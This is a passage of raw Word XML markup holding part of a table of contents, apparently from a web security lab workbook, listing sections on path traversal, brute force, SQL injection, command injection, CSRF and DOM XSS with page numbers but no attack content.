              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777183" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path Traversal</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777183 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B3F9E7C" w14:textId="68C74F3D" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777184" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777184 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32AFE4FF" w14:textId="2210B542" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777185" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force – Low level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777185 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20F0DE55" w14:textId="0627C87C" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777186" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777186 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="538E3899" w14:textId="22130843" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777187" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Low level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777187 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="121E17A2" w14:textId="1B039CB3" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777188" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Medium level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777188 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="277D515C" w14:textId="417703FC" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777189" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Online Challenges</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777189 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DA6F00C" w14:textId="49EC37F9" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777190" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777190 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5853A39F" w14:textId="7343AB3D" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777191" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Low level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777191 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BB8EB7F" w14:textId="492536C1" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777192" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Medium level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777192 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="202F2DB9" w14:textId="608A3093" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777193" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777193 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CF9C9BA" w14:textId="6E49A3E2" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777194" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777194 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25BCD544" w14:textId="73A8739C" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777195" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777195 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="584E4C5F" w14:textId="61CF7868" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777196" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777196 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ED4BAF8" w14:textId="32A74552" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777197" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777197 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5215897E" w14:textId="0C19CB19" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777198" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – High Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777198 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
